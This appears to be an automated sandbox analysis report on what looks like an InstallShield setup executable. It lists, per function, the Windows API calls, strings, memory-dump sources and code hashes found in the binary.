                                                                                                                                                                          • Opcode Fuzzy Hash: 278945ba514fa351542ebb51b170e1af732bfb0141513c739876c3e692eddbcc
                                                                                                                                                                          • Instruction Fuzzy Hash: BC21F534904618AEEB24DBB5CC55BED7BB4AF01304F6500AFF801A72D2DB795989CB58
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00416035, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0041603C
                                                                                                                                                                            • Part of subcall function 0041618B: __EH_prolog3.LIBCMT ref: 00416192
                                                                                                                                                                            • Part of subcall function 0041618B: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000004,0045D722,?,00000000,?,000000FF,000000FF,?,00438D5E,000000FF,00000000,80400100), ref: 004161AE
                                                                                                                                                                            • Part of subcall function 0041618B: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,000000FF,?,00438D5E,000000FF,00000000,80400100,?,00000000,0045611E,0047C4E4), ref: 004161BE
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00416094
                                                                                                                                                                            • Part of subcall function 004432A1: _malloc.LIBCMT ref: 004432B9
                                                                                                                                                                          • QueryPerformanceFrequency.KERNEL32(?), ref: 004160E7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateEventH_prolog3$DesktopFrequencyPerformanceQueryWindow_malloc
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3435033758-1835203436
                                                                                                                                                                          • Opcode ID: a5cb22c5a949a6c6b7a34181e198b846f5d14767d0747c5c675e951ea848145e
                                                                                                                                                                          • Instruction ID: f8c9ebf2e94ac5d54ce2366671be5678a5ced366b5f8eee2c8d3db243b58cd02
                                                                                                                                                                          • Opcode Fuzzy Hash: a5cb22c5a949a6c6b7a34181e198b846f5d14767d0747c5c675e951ea848145e
                                                                                                                                                                          • Instruction Fuzzy Hash: 7B31D2B0904B44DFD720DF7A858138AFBF0BB08304F90896E959E97742CB79A584DF15
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041C2C9, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041C2D0
                                                                                                                                                                          • GetLastError.KERNEL32(0000003C,0043412D,no_engine,?,00000001,?,?,00000001,?,?,00000000,0000000A,Startup,?,00000001,ScriptDriven), ref: 0041C2FB
                                                                                                                                                                          • SetLastError.KERNEL32(?), ref: 0041C334
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3_
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3339191932-1835203436
                                                                                                                                                                          • Opcode ID: 20e62f0c2ec7f2c74fc7673461cc99b8a8fcbc9d3eec5d733313c3d3a8af00b6
                                                                                                                                                                          • Instruction ID: 62cb9a81948d1d56b77c4fd3a2d0143701c0b1730441d78e08ff4d519215b56b
                                                                                                                                                                          • Opcode Fuzzy Hash: 20e62f0c2ec7f2c74fc7673461cc99b8a8fcbc9d3eec5d733313c3d3a8af00b6
                                                                                                                                                                          • Instruction Fuzzy Hash: E221B070900645EFDB00DFA4C98469DBBB4FF14304F14815EF804A7792C7B8EA41CB84
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004381F1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: lstrcpy$H_prolog3_
                                                                                                                                                                          • String ID: |LJ
                                                                                                                                                                          • API String ID: 3091677954-1752162465
                                                                                                                                                                          • Opcode ID: c28049ed4bff5508e8d0906e59bdb8800d9726610d951e9cca53c0e8368b285c
                                                                                                                                                                          • Instruction ID: 52bb43b2b89eb870e515fe47fe89b4839b49d492b860031220af9519a339598b
                                                                                                                                                                          • Opcode Fuzzy Hash: c28049ed4bff5508e8d0906e59bdb8800d9726610d951e9cca53c0e8368b285c
                                                                                                                                                                          • Instruction Fuzzy Hash: AC11E772901A11BBD710AB96CC49E9F7768EF59304F10415AF509A3152CF78AA05CB6D
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00434F94, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3_
                                                                                                                                                                          • String ID: Extracting setup.ini...$session.cpp$|LJ
                                                                                                                                                                          • API String ID: 2427045233-2894076531
                                                                                                                                                                          • Opcode ID: c00bc900b6e87426a2388762658d67cfe78a6c96a48608b81b26b3bfaf16d7ca
                                                                                                                                                                          • Instruction ID: 5127aa001cf11088d37934927bdc7d0d6560b95a0499f84f879ebea9d0f8d96a
                                                                                                                                                                          • Opcode Fuzzy Hash: c00bc900b6e87426a2388762658d67cfe78a6c96a48608b81b26b3bfaf16d7ca
                                                                                                                                                                          • Instruction Fuzzy Hash: AA119170600208ABEB15EBA5CC91BEE76686B95358F64413FF401A71D2DBBC5A09C75C
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00456CB8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00456CBF
                                                                                                                                                                            • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
                                                                                                                                                                            • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
                                                                                                                                                                          • UuidToStringW.RPCRT4(?,?), ref: 00456CFF
                                                                                                                                                                            • Part of subcall function 00459275: __EH_prolog3.LIBCMT ref: 0045927C
                                                                                                                                                                            • Part of subcall function 00459275: CharUpperW.USER32(00000000,?,00000008,0000000C,00456D2A,00483E18), ref: 0045929E
                                                                                                                                                                          • RpcStringFreeW.RPCRT4(00000000), ref: 00456D2E
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
                                                                                                                                                                            • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
                                                                                                                                                                            • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
                                                                                                                                                                            • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
                                                                                                                                                                            • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$String$Free$H_prolog3$CharH_prolog3_UpperUuid
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 1620240345-1835203436
                                                                                                                                                                          • Opcode ID: f3da9a06632e1c675204edba0b50f9af05f9e438436560d617572d9ae178c0cb
                                                                                                                                                                          • Instruction ID: d24855ae23804708f9657643eff9035aa9f7aeb912aa3f98b943b46fcc39d6b4
                                                                                                                                                                          • Opcode Fuzzy Hash: f3da9a06632e1c675204edba0b50f9af05f9e438436560d617572d9ae178c0cb
                                                                                                                                                                          • Instruction Fuzzy Hash: D3113D71900618DBDB00EFD1CC95BEEB3B9BF04305F40402AF906AB195DB789E09CB94
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 004015E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46registryCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00401410: GetModuleHandleW.KERNEL32(Advapi32.dll), ref: 00401434
                                                                                                                                                                            • Part of subcall function 00401410: RegCloseKey.ADVAPI32(00000000), ref: 00401497
                                                                                                                                                                          • RegQueryValueExW.ADVAPI32(00000000,DoVerboseLogging,00000000,?,?,?), ref: 0040163D
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040165D
                                                                                                                                                                          Strings
                                                                                                                                                                          • SOFTWARE\InstallShield\24.0\Professional, xrefs: 004015ED
                                                                                                                                                                          • DoVerboseLogging, xrefs: 00401629
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Close$HandleModuleQueryValue
                                                                                                                                                                          • String ID: DoVerboseLogging$SOFTWARE\InstallShield\24.0\Professional
                                                                                                                                                                          • API String ID: 2971604672-1143489823
                                                                                                                                                                          • Opcode ID: 992b17fd394f65c8631625403619c4111f21bfa462fd2a9ff2ff8759e5b327bc
                                                                                                                                                                          • Instruction ID: b8d5da7c66694fb68f9347787991ccd354379e7a8fa7ff93a32c878f4c705014
                                                                                                                                                                          • Opcode Fuzzy Hash: 992b17fd394f65c8631625403619c4111f21bfa462fd2a9ff2ff8759e5b327bc
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D017C71941219ABDB10EF90CC45BEFBBBCAB14709F140566E905B3290D3BA5B48CBD9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040C64F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0040C656
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00000000,0040C974,00000000,?), ref: 0040C6CD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last
                                                                                                                                                                          • String ID: HsG$m<H
                                                                                                                                                                          • API String ID: 1018228973-3913731857
                                                                                                                                                                          • Opcode ID: 8cf3a0a999b89bcb033bf6d8dc2d302470aa6ffe6800c7849b1526259a407428
                                                                                                                                                                          • Instruction ID: d825e472a561230fa74be267a8af8d30e25b86a91737dd089b8851c6b07c70dc
                                                                                                                                                                          • Opcode Fuzzy Hash: 8cf3a0a999b89bcb033bf6d8dc2d302470aa6ffe6800c7849b1526259a407428
                                                                                                                                                                          • Instruction Fuzzy Hash: 6211C431500204EBE721EF50CD45BAE7B64AF10318F24896FF8466B2D2DBBA9E05D798
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00436D6C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44stringCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • _memset.LIBCMT ref: 00436D9B
                                                                                                                                                                            • Part of subcall function 0040D2E5: __EH_prolog3_GS.LIBCMT ref: 0040D2EC
                                                                                                                                                                          • lstrlenW.KERNEL32(?,Startup,ClickOncePackage,00483E18,?,00000400), ref: 00436DCD
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: H_prolog3__memsetlstrlen
                                                                                                                                                                          • String ID: ClickOncePackage$Startup
                                                                                                                                                                          • API String ID: 1437836783-2858441910
                                                                                                                                                                          • Opcode ID: ea71743ab89a5ca5303532964b9c085456cf6fdda5492b1745845f7143a06986
                                                                                                                                                                          • Instruction ID: 00cab8686a5252d2d403d26306d96d7645744e35640d156a439eb197855bdaf6
                                                                                                                                                                          • Opcode Fuzzy Hash: ea71743ab89a5ca5303532964b9c085456cf6fdda5492b1745845f7143a06986
                                                                                                                                                                          • Instruction Fuzzy Hash: 4D01DBA5A402186AD710EB64DD42BEA73E8BB04704F0194BBA545D3181DA74DD4C8798
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00454A1B, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00454A25
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00454A40
                                                                                                                                                                            • Part of subcall function 00433B38: __EH_prolog3.LIBCMT ref: 00433B3F
                                                                                                                                                                            • Part of subcall function 00433B38: GetLastError.KERNEL32(00000004,0043383A,00000008,0043899A,0047C4E4,00000001,?,00000001), ref: 00433B58
                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00454A61
                                                                                                                                                                            • Part of subcall function 00442782: RaiseException.KERNEL32(?,?,00441450,00000000,?,?,?,?,00441450,00000000,00497AC0,?), ref: 004427D3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DirectoryErrorExceptionException@8H_prolog3H_prolog3_LastRaiseThrowWindows
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 1535131608-1835203436
                                                                                                                                                                          • Opcode ID: 7df2d63a109fe508e11848c9e03216674d95b0a4fde9a4f468ac0587a1fdcc2c
                                                                                                                                                                          • Instruction ID: 738dcb46aa4ec7d92096cdf70d8b8e4eca770e8a71218333f8b7bfe85e45d998
                                                                                                                                                                          • Opcode Fuzzy Hash: 7df2d63a109fe508e11848c9e03216674d95b0a4fde9a4f468ac0587a1fdcc2c
                                                                                                                                                                          • Instruction Fuzzy Hash: 4A116170940218ABDB60EB51CC89BEDB378EF54305F9041EAB50CA7191DB785B89CF48
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0041F4B2, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 0041F4B9
                                                                                                                                                                          • __itow_s.LIBCMT ref: 0041F4F0
                                                                                                                                                                          • SetLastError.KERNEL32(00000006,?,00000000,?,?,?,00000000,?,?,00000001), ref: 0041F51F
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorH_prolog3_Last__itow_s
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3681815494-1835203436
                                                                                                                                                                          • Opcode ID: 141a998db04d8435969142fc884c128a1dd653a3268565f93a54bea6e730b0b4
                                                                                                                                                                          • Instruction ID: 72fed4a1c090c88f25d5264139b5968bc905611f59b8789e4007883ab4b7c8e0
                                                                                                                                                                          • Opcode Fuzzy Hash: 141a998db04d8435969142fc884c128a1dd653a3268565f93a54bea6e730b0b4
                                                                                                                                                                          • Instruction Fuzzy Hash: 80019E71800208ABEB20FFA1DA45DAEB7B5FB40714F54812EF9459B181DBB99945CB48
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0040C401, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 0040C408
                                                                                                                                                                          • GetLastError.KERNEL32(00000004,0040C5BD,?,00000008,?,00000000,00000000,00000004,00410069,?,00000008,?,?,00000001,00000008,004107EF), ref: 0040C42A
                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00000000,00000008,?,00000000,?,00000008,?,?,00000001,00000008,004107EF,?,00000001,000000FF,?), ref: 0040C473
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorLast$H_prolog3
                                                                                                                                                                          • String ID: HsG
                                                                                                                                                                          • API String ID: 3502553090-1835203436
                                                                                                                                                                          • Opcode ID: 6a687fc130528b7c81639662b604ace4c907064117be3216f3bd9b2d491dd4ca
                                                                                                                                                                          • Instruction ID: 31aa934b069825b4e2f92146ce4853e7872e7a01a0153d36dc74fde3a21ee056
                                                                                                                                                                          • Opcode Fuzzy Hash: 6a687fc130528b7c81639662b604ace4c907064117be3216f3bd9b2d491dd4ca
                                                                                                                                                                          • Instruction Fuzzy Hash: 62118071500646EFDB01DF68C949699BFB1FF08314F15826AF5089B791C7B4E950DF88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00454ACD, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39fileCOMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00454AD7
                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000,00000088,0045955F,0000BBEF,00000003), ref: 00454AFB
                                                                                                                                                                            • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
                                                                                                                                                                            • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
